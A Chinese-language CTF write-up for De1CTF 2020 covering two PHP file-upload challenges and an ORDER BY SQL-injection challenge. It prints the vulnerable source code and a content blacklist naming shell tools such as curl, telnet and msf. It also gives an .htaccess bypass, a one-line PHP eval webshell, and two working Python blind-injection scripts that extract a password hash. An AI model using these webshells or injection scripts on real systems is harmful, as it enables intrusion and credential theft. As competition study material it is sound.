De1CTF 2020
1. check in
考点:.htaccess实现文件上传
参考资料:
1、 利用htaccess绕黑名单,mail绕过disable function https://xz.aliyun.com/t/3937
2、.htaccess tricks总结 https://www.cnblogs.com/20175211lyz/p/11741348.html
3、[SUCTF 2019]CheckIn https://www.jianshu.com/p/2907426b4a91
4、各种一句话木马大全 https://blog.csdn.net/l1028386804/article/details/84206143
题目源码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Cheek in</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" href="style/css/style1.css">
<link rel="stylesheet" type="text/css" href="style/css/style2.css">
</head>
<?php
error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
$typeAccepted = ["image/jpeg", "image/gif", "image/png"];
if (!file_exists($userdir)) {
mkdir($userdir, 0777, true);
}
if (isset($_POST["upload"])) {
$tmp_name = $_FILES["fileUpload"]["tmp_name"];
$name = $_FILES["fileUpload"]["name"];
$black = file_get_contents($tmp_name);
if (!$tmp_name) {
$result1 ="???";
}else if (!$name) {
$result1 ="filename cannot be empty!";
}
else if (preg_match("/ph|ml|js|cg/i", $name)) {
$result1 = "filename error";
}
else if (!in_array($_FILES["fileUpload"]['type'], $typeAccepted)) {
$result1 = 'filetype error';
}
else if (preg_match("/perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet/i",$black)){
$result1 = "perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!";
}
else {
$upload_file_path = $userdir . "/" . $name;
move_uploaded_file($tmp_name, $upload_file_path);
system("chmod +x ".$userdir."/*");
$result2= "Your dir : " . $userdir. ' <br>';
$result3= "Your files :" .$name.'<br>';
}
}else{
$result1 = 'upload your file';
}
?>
<body>
<div class="wrap">
<div class="container">
<h1 style="color: white; margin: 0; text-align: center">UPLOADS</h1>
<form action="index.php" method="post" enctype="multipart/form-data">
<input class="wd" type="file" name="fileUpload" id="file"><br>
<input class="wd" type="submit" name="upload" value="submit">
<p class="change_link" style="text-align: center">
<strong><?php print_r($result1);?></strong>
</br>
<strong><?php print_r($result3);?></strong>
</br>
<strong><?php print_r($result2);?></strong>
</p>
</form>
</div>
</div>
</body>
</html>思路:
看到文件名和内容过滤了php、auto、>,就想到用.htaccess,
AddType application/x-httpd-p\
hp .wuwu一句话用一个短标签的,绕过>
<?=eval($_POST['cmd']);2. Hard_Pentest_1
考点:文件上传
参考资料:
1、【PHP-CTF】无字母无数字webshell https://blog.csdn.net/a15803617402/article/details/83589181
2、一些不包含数字和字母的webshell https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html
3、CTF 中的 PHP 知识汇总 https://www.restran.net/2016/09/26/php-security-notes/
4、https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if($_POST["submit"]){
if (($_FILES["file"]["size"] < 2048) && Check()){
if ($_FILES["file"]["error"] > 0){
die($_FILES["file"]["error"]);
}
else{
$filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
echo "save in:" . $sandbox."/" . $filename;
}
}
else{
echo "Not Allow!";
}
}
function Check(){
$BlackExts = array("php");
$ext = explode(".", $_FILES["file"]["name"]);
$exts = trim(end($ext));
$file_content = file_get_contents($_FILES["file"]["tmp_name"]);
if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content) &&
!in_array($exts, $BlackExts) &&
!preg_match('/\.\./',$_FILES["file"]["name"])) {
return true;
}
return false;
}
?>
<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>
思路:
很恶心,;都过滤了,上传一句话不可见字符webshell。
文件名后缀黑名单用phtml绕过。
3. Mixture
链接:
考点:order by sql注入
参考资料:
1、https://forum.90sec.com/t/topic/296
exp:
import requests
url = "http://49.51.251.99/index.php"
data = {
"username":"xxxxx",
"password":"xxxxxxx",
"submit":"submit"
}
cookie ={
"PHPSESSID": "sou26piclav6f99h79k1l5vmbn"
}
requests.post(url,data=data,cookies=cookie)
flag=''
url="http://49.51.251.99/member.php?orderby="
for i in range(1,33):
for j in '0123456789abcdefghijklmnopqrstuvwxyz,':
payload="|(mid((select password from member),{},1)='{}')%2b1".format(i,j)
true_url=url+payload
r=requests.get(true_url,cookies=cookie)
if r.content.index('tom')<r.content.index('1000000'):
print payload+' ok'
flag+=j
print flag
break
else:
print payload
#18a960a3a0b3554b314ebe77fe545c85 import requests
from urllib import parse
base_url = 'http://134.175.185.244/member.php'
url = 'http://134.175.185.244/member.php?orderby=|{}'
result = ''
cookies = {'PHPSESSID':'nit7d8990st0kdk4q5b5d91528'}
for i in range(1,127):
high = 127
low = 32
mid = (high+low)//2
while high>low:
# payload = '(select case when (ascii(substring((select database()) from {} for 1))>{}) then 1 else 2 end)'
# payload = '(select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),{},1))>{}) then 1 else 2 end)'
# payload = '(select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273),{},1))>{}) then 1 else 2 end)'
# payload = '(select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 0x6d656d626572),{},1))>{}) then 1 else 2 end)'
payload = '(select case when (ascii(substr((select password from member),{},1))>{}) then 1 else 2 end)'
# 18a960a3a0b3554b314ebe77fe545c85
payload = parse.quote(payload.format(i,mid))
# print(payload.format(i,mid))
res1 = requests.get(base_url,cookies=cookies)
res2 = requests.get(url.format(payload),cookies=cookies)
if res1.content==res2.content:
low = mid+1
else:
high = mid
mid = (high+low)//2
result +=chr(int(mid))
print(result)
